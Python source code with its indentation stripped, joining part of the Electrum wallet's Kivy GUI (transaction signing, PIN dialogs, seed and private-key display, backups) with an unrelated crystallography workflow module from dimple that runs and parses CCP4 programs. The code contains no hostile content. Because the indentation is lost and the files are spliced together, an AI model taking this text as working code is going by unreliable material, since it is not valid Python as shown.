def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 5*60:
self.pincode_dialog(check_password=self.check_pin_code, on_success=None, on_failure=self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
on_success = lambda pw: f(*(args + (self.password,)))
self.pincode_dialog(
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
else:
f(*(args + (self.password,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter PIN code to display your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def password_dialog(self, **kwargs):
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, **kwargs)
self._password_dialog.open()
def pincode_dialog(self, **kwargs):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
self._pincode_dialog.init(self, **kwargs)
self._pincode_dialog.open()
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
self.password_dialog(
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password=self.wallet.has_password())
def change_pin_code(self, cb):
if self._pincode_dialog is None:
self._pincode_dialog = PincodeDialog()
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
self._pincode_dialog.init(
self, check_password=self.check_pin_code,
on_success=on_success, on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
self._pincode_dialog.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
workflow.py
|
import os
import sys
from subprocess import Popen, PIPE
import gzip
import errno
import pipes
import re
import threading
try:
import Queue as queue # Python 2
except ImportError:
import queue # Python 3
import time
try:
import cPickle as pickle # Python 2
except ImportError:
import pickle # Python 3
import shutil
if __name__ == '__main__' and __package__ is None:
sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__
))))
from dimple import coots
from dimple import mtz
from dimple import pdb
from dimple import utils
# Python 2 and 3 compatibility
try:
basestring
except NameError:
basestring = str
_jobindex_fmt = '%3d '
_jobname_fmt = '%-15s'
_elapsed_fmt = '%5.1fs '
PICKLE_FILENAME = 'workflow.pickle'
# heh, python from MSYS2 is handy, but needs some monkey-patching
if sys.platform == 'msys':
old_opjoin = os.path.join
def new_opjoin(*args):
for n in range(len(args)-1, -1, -1):
if n == 0 or os.path.isabs(args[n]):
return old_opjoin(*args[n:])
os.path.join = new_opjoin
class JobError(Exception):
def __init__(self, msg, note=None): # pylint: disable=super-init-not-called
self.msg = msg
self.note = note
class Output:
"storage for Job's stdout/stderr"
def __init__(self, role):
self.role = role # 'out' or 'err'
self.file_extension = {'out': 'log', 'err': 'err'}[role]
self.lines = []
self.saved_to = None
self.que = None
def __nonzero__(self):
return bool(self.lines or self.saved_to)
def size_as_str(self):
if self.lines:
return '%d lines' % len(self.lines)
else:
return '- '
def read_line(self):
while self.que is not None:
try:
line = self.que.get_nowait()
except queue.Empty:
break
self.lines.append(line)
yield line
def finish_que(self):
if self.que:
while not self.que.empty():
self.lines.append(self.que.get_nowait())
self.que = None
def save_output(self, output_dir, basename, remove_long_list=True):
filename = basename + '.' + self.file_extension
if self.lines:
with open(os.path.join(output_dir, filename), 'wb') as f:
for line in self.lines:
f.write(line)
self.saved_to = filename
utils.log_value('std'+self.role, filename)
if remove_long_list and len(self.lines) > 5:
self.lines = []
def summary(self):
n = len(self.lines)
if 0 < n <= 3:
return ''.join(self.lines)
elif self.saved_to:
return '-> %s' % self.saved_to
elif n == 0:
return ''
else: # n > 3
return ''.join(self.lines[:3]) + ('%s more lines' % (n-3))
class Job:
def __init__(self, workflow, prog):
self.name = os.path.basename(prog) or prog # only used to show info
self.workflow = workflow
self.args = [prog]
self.std_input = ''
self.stdin_file = None # if set, it overwrites std_input
# the rest is set after the job is run
self.exit_status = None
self.out = Output('out')
self.err = Output('err')
self.started = None # will be set to time.time() at start
self.total_time = None # will be set when job ends
# possible values: None (stdout preview),
# string starting with space (' ') that is just shown,
# or name of global function that parses output
self.parser = None
# job-specific data from output parsing
self.data = {}
def __repr__(self):
if self.started:
t = time.strftime(' %Y-%m-%d %H:%M', time.localtime(self.started))
else:
t = ''
return '<Job %s%s>' % (self.name, t)
def args_as_str(self):
s = ' '.join(pipes.quote(a) for a in self.args)
if self.stdin_file:
s += ' < ' + self.stdin_file
elif self.std_input:
s += ' << EOF\n%s\nEOF' % self.std_input
return s
def run(self, show_progress=True, new_line=True, may_fail=False):
self.workflow.run_job(job=self,
show_progress=show_progress, new_line=new_line)
# exit_status may be None if --from-step is used
if not may_fail and self.exit_status:
notes = [self.args_as_str(), '']
if self.out.saved_to:
notes += ['stdout -> %s/%s' % (self.workflow.output_dir,
self.out.saved_to)]
if self.err:
notes += ['stderr:', self.err.summary()]
raise JobError('%s failed (exit status %d)' % (self.name,
self.exit_status),
note='\n'.join(notes))
return self
def parse(self):
if self.parser is None: # preview mode
# generic non-parser
line = b''
for line in self.out.read_line():
pass
if line:
trimmed = _PREVIEW_DISCARD_RE.sub('', line.strip().decode())
ret = '[%d] %-44.44s' % (len(self.out.lines), trimmed)
else:
ret = 'stdout:%11s' % self.out.size_as_str()
if self.err:
ret += ' stderr: %s' % self.err.size_as_str()
ret = ret.ljust(50)
return ret
elif self.parser == '' or self.parser[0] == ' ':
return self.parser
else:
p = globals()[self.parser]
return p(self)
def _format(fmt, arg):
return (fmt % arg) if arg else ''
# parsers for various programs
def _find_blobs_parser(job):
if 'blobs' not in job.data:
job.data['blobs'] = []
job.data['scores'] = []
for line in job.out.read_line():
if line.startswith(b'#'):
sp = line.split(None, 6)
score = float(sp[5])
if True: # score > 150: XXX: better scoring may be needed
x, y, z = sp[-1].strip(b'() \t\r\n').split(b',')
job.data['blobs'].append((float(x), float(y), float(z)))
job.data['scores'].append(score)
elif line.startswith(b'Protein mass center:'):
sp = line.split(b'(')[1].rstrip(b'\r\n )').split(b',')
ctr = tuple(float(x) for x in sp)
job.data['center'] = ctr
elif line.startswith(b'Density std.dev'):
job.data['density_info'] = line.strip().decode()
scores = job.data['scores']
if scores:
return 'Blob scores: ' + ' '.join('%.0f' % sc for sc in scores[:8])
elif 'density_info' in job.data:
return 'searching with' + job.data['density_info'].split(',')[1]
else:
return ''
def _anode_parser(job):
if 'xyz' not in job.data:
job.data['xyz'] = []
job.data['height'] = []
job.data['sof'] = []
job.data['distance'] = []
job.data['atom'] = []
found_strongest_peaks = False
for line in job.out.read_line():
if b'Strongest unique anomalous peaks' in line:
found_strongest_peaks = True
continue
if found_strongest_peaks:
tokens = line.split()
if len(tokens) == 8:
job.data['xyz'].append(tuple(float(t) for t in tokens[1:4]))
job.data['height'].append(float(tokens[4]))
job.data['sof'].append(float(tokens[5]))
job.data['distance'].append(float(tokens[6]))
job.data['atom'].append(tokens[7].decode())
if found_strongest_peaks:
return ('%s anomalous peaks with height h>4 sigma'
% len(job.data['height']))
else:
return ''
def _rwcontents_parser(job):
d = job.data
for line in job.out.read_line():
if line.startswith(b' Cell volume:'):
vol = float(line.split(b':')[-1])
if vol != 0:
d['volume'] = vol
elif line.startswith(b' Molecular Weight of protein:'):
d['weight'] = float(line.split(b':')[-1])
elif line.startswith(b' Molecular Weight of all atoms:'):
d['total_weight'] = float(line.split(b':')[-1])
elif line.startswith(b' Number of amino-acids residues ='):
d['aa_count'] = int(line.split(b'=')[-1])
elif line.startswith(b' - number of waters'):
d['water_count'] = float(line.split()[-1])
elif line.startswith(b' The Matthews Coefficient is :'):
Vm = float(line.split(b':')[-1])
if Vm != 0:
d['Vm'] = Vm
# 1.23 is used in Rupp's papers and in Phaser
d['solvent_percent'] = (1 - 1.23/Vm) * 100
if 'volume' in d and 'weight' in d and 'Vm' in d and 'num_mol' not in d:
d['num_mol'] = int(round(d['volume'] / d['weight'] / d['Vm']))
protein_kDa = d.get('weight', 0) / 1000. # Da -> kDa
total_kDa = d.get('total_weight', 0) / 1000.
msg = '%s x %.0fkDa (+ %.0fkDa het)' % (d.get('num_mol', '??'),
protein_kDa,
total_kDa - protein_kDa)
if 'volume' in d:
msg += ' in %.fnm3, %.0f%% solvent' % (d['volume'] / 1000,
d.get('solvent_percent', 0))
return msg
def _cad_parser(job):
d = job.data
for line in job.out.read_line():
# for now we're only interested in number of reflections from HKLIN1
if b'* Number of Reflections =' in line and b'refl_in1' not in d:
d['refl_in1'] = int(line.split(b'=')[1])
elif b' Final Total of Unique records to HKLOUT =' in line:
d['refl_out'] = int(line.split(b'=')[1])
return '#refl %s -> %s' % (d.get('refl_in1', ''), d.get('refl_out', ''))
class Ccp4LogTable(object):
def __init__(self, title_line):
assert b'$TABLE:' in title_line
self.title = title_line.split(b':')[1].decode()
self.columns = []
self.data = []
self.section = 0 # 0=header, 1=columns, 2=data, 3=end
def send_line(self, line):
line = line.strip()
if line.startswith(b'$$'):
self.section += 1
if len(line) > 2:
self.send_line(line[2:])
return self.section != 3
if self.section == 1:
self.columns += line.rstrip(b'$').decode().split()
elif self.section == 2:
self.data.append(line.decode().split())
return True
def column(self, name):
try:
idx = self.columns.index(name)
return [float(a[idx]) for a in self.data]
except (ValueError, IndexError):
return
def _refmac_parser(job):
if 'cycle' not in job.data:
# ini_free_r, free_r and iter_free_r are set optionally
job.data['cycle'] = 0
# iter_*_r values were added in dimple 1.5
job.data['iter_overall_r'] = []
for line in job.out.read_line():
if 'sink' in job.data:
more = job.data['sink'].send_line(line)
if not more:
for name in ['rmsBOND', 'rmsANGL', 'rmsCHIRAL']:
col_data = job.data['sink'].column(name)
if col_data and any(x != 0 for x in col_data):
job.data[name] = col_data
del job.data['sink']
elif line.startswith(b'Free R factor'):
job.data['free_r'] = float(line.split(b'=')[-1])
if 'ini_free_r' not in job.data:
job.data['ini_free_r'] = job.data['free_r']
job.data['iter_free_r'] = []
job.data['iter_free_r'].append(job.data['free_r'])
elif line.startswith(b'Overall R factor'):
job.data['overall_r'] = float(line.split(b'=')[-1])
if 'ini_overall_r' not in job.data:
job.data['ini_overall_r'] = job.data['overall_r']
job.data['iter_overall_r'].append(job.data['overall_r'])
elif (line.startswith(b' Rigid body cycle =') or
line.startswith(b' CGMAT cycle number =')):
job.data['cycle'] = int(line.split(b'=')[-1])
elif line.startswith(b'$TABLE: Rfactor analysis, stats vs cycle'):
job.data['sink'] = Ccp4LogTable(line)
cycle_str = '%2d/%d' % (job.data['cycle'], job.data.get('ncyc', -1))
if 'ini_overall_r' in job.data:
if 'ini_free_r' in job.data:
return '%s R/Rfree %.4f/%.4f -> %.4f/%.4f' % (
cycle_str,
job.data['ini_overall_r'], job.data['ini_free_r'],
job.data['overall_r'], job.data['free_r'])
return '%s R %.4f -> %.4f' % (
cycle_str, job.data['ini_overall_r'], job.data['overall_r'])
return cycle_str
# example:
# noqa
# Alternative reindexing Lklhd CC R(E^2) Number Cell_deviation
# [-k,-l,h+k+l] 0.079 0.029 0.506 61253 2.99
# in pointless 1.10.22 Phil added numbers in the first column
# 1 [h,k,l] 0.499 ...
_POINTLESS_ALTREINDEX_RE = re.compile(br'^\s*\d*\s+(\[[hkl+, -]+\]'
br'[ \t\r0-9+.eE-]+)$')
_PREVIEW_DISCARD_RE = re.compile(r'[^\w!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~ -]')
def _float_or_nan(s):
try:
x = float(s)
except ValueError:
x = float('nan')
return x
def _pointless_parser(job):
# the line with 'reflections copied' is the last we read
# to avoid reading 'Alternative reindexing' duplicated in the summary
if 'refl_out' not in job.data:
for line in job.out.read_line():
if line.startswith(b'Maximum resolution used:'):
job.data['resol'] = float(line.split(b':')[1])
elif line.startswith(b'Number of reflections:'):
job.data['refl_ref'] = int(line.split(b':')[1])
elif _POINTLESS_ALTREINDEX_RE.match(line):
s = _POINTLESS_ALTREINDEX_RE.match(line).group(1).split()
job.data.setdefault('alt_reindex', []).append(
{'op': s[0].decode(), # noqa E126 - indentation
'cc': _float_or_nan(s[2]),
'cell_deviat': _float_or_nan(s[-1])})
elif line.startswith(b' Cell:') and 'output_cell' not in job.data:
s = line.split()[1:]
job.data['output_cell'] = tuple(float(i) for i in s)
elif b'reflections copied to output file' in line:
job.data['refl_out'] = int(line.split()[0])
break
resol_txt = _format('%.2f', job.data.get('resol'))
refl_out = job.data.get('refl_out', '')
return 'resol. %4s A #refl: %5s' % (resol_txt, refl_out)
def _phaser_parser(job):
d = job.data
for line in job.out.read_line():
line = line.decode()
if line.startswith('*** Phaser Module:'):
d['info'] = '[%s]' % line[19:70].strip().lower()
elif 'written to PDB file:' in line:
d['expect_solu'] = 1
elif 'expect_solu' in d:
if line.startswith(' SOLU SET '):
d['status'] = line[12:].strip()
if len(d['status']) > 52:
d['info'] = d['status'][:50].rsplit(' ', 1)[0] + '...'
else:
d['info'] = d['status']
elif 'status' in d and ' SOLU ' not in line: # continuation
d['status'] += ' ' + line.strip()
elif line.startswith(' SOLU SPAC '):
d['SG'] = line[13:].strip()
del d['expect_solu']
elif 'Sorry - No solution' in line:
d['info'] = line.strip('* \t\r\n')
if 'No solution with all components' in line:
d['partial_solution'] = 'yes'
elif ' ERROR:' in line:
# the error about impossible content has two lines, let's reword it
d['error'] = line.strip().replace('a protein/nucleic acid',
'impossible content')
return '%-48s' % d.get('info', '')
def _ensembler_parser(job):
job.data.setdefault('models', [])
for line in job.out.read_line():
if b'Model ' in line:
job.data['models'].append(line.split()[-1].strip(b"')").decode())
return 'ensembled chains: ' + ' '.join(job.data['models'])
def _truncate_parser(job):
for line in job.out.read_line():
if line.startswith(b' Least squares straight line gives:'):
b_str = line.partition(b':')[-1].strip(b' \tB=').split()[0]
job.data['B-factor'] = float(b_str)
return 'B=%4s' % _format('%.1f', job.data.get('B-factor'))
def _ctruncate_parser(job):
d = job.data
for line in job.out.read_line():
if line.startswith(b'$GRAPHS: Wilson plot - estimated B factor ='):
d['B-factor'] = float(line.partition(b'=')[-1].split()[0])
elif line.startswith(b'Eigenvalue ratios:'):
d['eigval-ratios'] = tuple(float(i) for i in line.split()[-3:])
elif line.startswith(b'L statistic ='):
d['L-test'] = float(line.partition(b'=')[-1].split()[0])
return 'B=%4s aniso %14s L-test:%s' % (
_format('%.1f', d.get('B-factor')),
_format('%.2f:%.2f:%.2f', d.get('eigval-ratios')),
_format('%.2f', d.get('L-test')))
def ccp4_job(workflow, prog, logical=None, ki='', parser=None, add_end=True):
"""Handle traditional convention for arguments of CCP4 programs.
logical - dictionary with where keys are so-called logical names.
ki (string or list of lines) - Keyworded Input to be passed through stdin.
add_end - adds "end" as the last line of stdin
Note: "colin" and "labin" mean the same (column label),
but different programs use different keywords.
"""
job = Job(workflow, utils.cbin(prog))
if logical:
for a in ['hklin', 'hklout', 'hklref', 'xyzin', 'xyzout', 'libin']:
if logical.get(a):
job.args += [a.upper(), logical[a]]
lines = ki.splitlines() if isinstance(ki, basestring) else ki
stripped = [a.strip() for a in lines if a and not a.isspace()]
if add_end and not (stripped and stripped[-1].lower() == 'end'):
stripped.append('end')
job.std_input = '\n'.join(stripped)
job.parser = parser
return job
def _print_progress(job, event):
while not event.wait(0.5):
p = job.parse()
if p is not None:
text = (_elapsed_fmt % (time.time() - job.started)) + p
utils.put_temporarily(text)
utils.reset_color()
def _start_enqueue_thread(file_obj):
def enqueue_lines(f, q):
for line in iter(f.readline, b''):
q.put(line)
f.close()
que = queue.Queue()
thr = threading.Thread(target=enqueue_lines, args=(file_obj, que))
thr.daemon = True
thr.start()
return thr, que
def _get_input_as_string(job):
if job.stdin_file:
path = job.workflow.path(job.stdin_file)
try:
return open(path, 'rb').read()
except IOError:
raise JobError('cannot read input from: %s' % job.stdin_file)
else:
return job.std_input.encode()
def _run_and_parse(process, job):
try:
# job.*.que can be used by parsers (via Output.read_line() or directly)
out_t, job.out.que = _start_enqueue_thread(process.stdout)
err_t, job.err.que = _start_enqueue_thread(process.stderr)
try:
job_input = _get_input_as_string(job)
process.stdin.write(job_input)
except IOError as e:
utils.put('\nWarning: passing input to %s failed.\n' % job.name)
if e.errno not in (errno.EPIPE, errno.EINVAL):
raise
process.stdin.close()
out_t.join()
err_t.join()
process.wait()
# nothing is written to the queues at this point
# parse what's left in the queues
job.parse()
finally:
# take care of what is left by the parser
job.out.finish_que()
job.err.finish_que()
class Workflow:
def __init__(self, output_dir, from_job=0):
self.output_dir = os.path.abspath(output_dir)
self.jobs = []
self.file_info = {}
self.temporary_files = set()
self.from_job = from_job # skip jobs before from_job (for testing)
if from_job >= 1:
try:
_pkl = self.load_pickle()
self.repl_jobs = _pkl.jobs
self.file_info = _pkl.file_info
except:
self.repl_jobs = None
self.dry_run = False
self.enable_logs = True
self.argv = sys.argv
if not os.path.isdir(self.output_dir):
try:
os.makedirs(self.output_dir)
except OSError as e:
utils.put_error(e)
sys.exit(1)
# this can seriously affect Refmac compiled with GFortran
bad_var = os.getenv('GFORTRAN_UNBUFFERED_ALL')
if bad_var and bad_var[0] not in ('0', 'n', 'N'):
utils.put_error( # noqa
'$GFORTRAN_UNBUFFERED_ALL may terribly slow down Refmac',
comment='It is unset internally in dimple.')
del os.environ['GFORTRAN_UNBUFFERED_ALL']
# avoid html-like crap in the output of CCP4 program
os.environ['CCP_SUPPRESS_HTML'] = '1'
def __str__(self):
return 'Workflow with %d jobs @ %s' % (len(self.jobs), self.output_dir)
def path(self, rel_path):
return os.path.join(self.output_dir, rel_path)
def dump_pickle(self):
with open(self.path(PICKLE_FILENAME), 'wb') as f:
pickle.dump(self, f, -1)
def load_pickle(self):
with open(self.path(PICKLE_FILENAME), 'rb') as f:
return pickle.load(f)
def run_job(self, job, show_progress, new_line=True):
if not hasattr(sys.stdout, 'isatty') or not sys.stdout.isatty():
show_progress = False
self.jobs.append(job)
job_num = len(self.jobs)
if new_line:
utils.put('\n' + _jobindex_fmt % job_num)
utils.put_green(_jobname_fmt % job.name)
else:
utils.put(' / %d' % job_num)
sys.stdout.flush()
utils.log_section(job.name)
job_idx = len(self.jobs) - 1
if job_idx < self.from_job - 1: # from_job is 1-based
# unpickle or skip
if self.repl_jobs and len(self.repl_jobs) > job_idx:
old_job = self.repl_jobs[job_idx]
if old_job.name == job.name:
job.data = old_job.data
job = old_job
utils.put('unpickled')
utils.log_value('not_run', 'unpickled')
self.jobs[-1] = job
else:
utils.put('skipped (mismatch)')
utils.log_value('not_run', 'unpickled/mismatch')
else:
utils.put('skipped')
utils.log_value('not_run', 'skipped')
return
job.started = time.time()
utils.log_time('start_time', job.started)
if job.stdin_file:
utils.log_value('stdin', job.stdin_file)
elif job.std_input:
utils.log_value('input', job.std_input)
utils.log_value('prog', job.args[0])
utils.log_value('args', ' '.join(pipes.quote(a) for a in job.args[1:]))
utils.log_flush()
# job.args[0] = 'true' # for debugging
try:
process = Popen(job.args, stdin=PIPE, stdout=PIPE, stderr=PIPE,
cwd=self.output_dir)
except OSError as e:
if e.errno == errno.ENOENT:
raise JobError('Program not found: %s' % job.args[0])
else:
raise
if self.dry_run:
return
if show_progress:
event = threading.Event()
progress_thread = threading.Thread(target=_print_progress,
args=(job, event))
progress_thread.daemon = True
progress_thread.start()
try:
if job.parser is not None or show_progress:
_run_and_parse(process, job)
else:
job_input = _get_input_as_string(job)
out, err = process.communicate(input=job_input)
job.out.lines = out.splitlines(True)
job.err.lines = err.splitlines(True)
except KeyboardInterrupt:
raise JobError('KeyboardInterrupt while running %s' % job.name,
note=job.args_as_str())
finally:
if show_progress:
event.set()
progress_thread.join()
end_time = time.time()
job.total_time = end_time - job.started
utils.log_time('end_time', end_time)
job.exit_status = process.poll()
if new_line:
utils.put(_elapsed_fmt % job.total_time)
parse_output = job.parse()
utils.put('%s' % (parse_output or ''))
if parse_output:
utils.log_value('info', parse_output)
if self.enable_logs:
self._write_logs(job)
for k, v in job.data.items():
if k != 'info':
utils.log_value(k, v)
if job.exit_status != 0:
utils.log_value('exit_status', job.exit_status)
def _write_logs(self, job):
log_basename = '%02d-%s' % (len(self.jobs), job.name.replace(' ', '_'))
for output in (job.out, job.err):
output.save_output(self.output_dir, log_basename)
def remove_hetatm(self, xyzin, xyzout, remove_all):
with open(self.path(xyzout), 'w') as out:
return pdb.remove_hetatm(self.path(xyzin), out, remove_all)
def read_pdb_metadata(self, xyzin, print_errors):
if xyzin not in self.file_info:
self.file_info[xyzin] = pdb.read_metadata(self.path(xyzin),
print_errors)
return self.file_info[xyzin]
def read_mtz_metadata(self, hklin):
if hklin not in self.file_info:
self.file_info[hklin] = mtz.read_metadata(self.path(hklin))
return self.file_info[hklin]
def count_mtz_missing(self, hklin, col):
key = (hklin, 'missing', col)
if key not in self.file_info:
self.file_info[key] = mtz.get_num_missing(self.path(hklin), col)
return self.file_info[key]
def molrep(self, f, m, keys=''):
job = Job(self, utils.cbin('molrep'))
job.args += ['-f', f, '-m', m]
if keys:
job.args.append('-i')
job.std_input = keys.strip() + '\nend'
return job
def phaser_auto(self, hklin, labin, model, root, sg_alt, opt):
lines = [ # noqa
'MODE MR_AUTO',
'SEARCH METHOD FAST',
'SEARCH DEEP OFF',
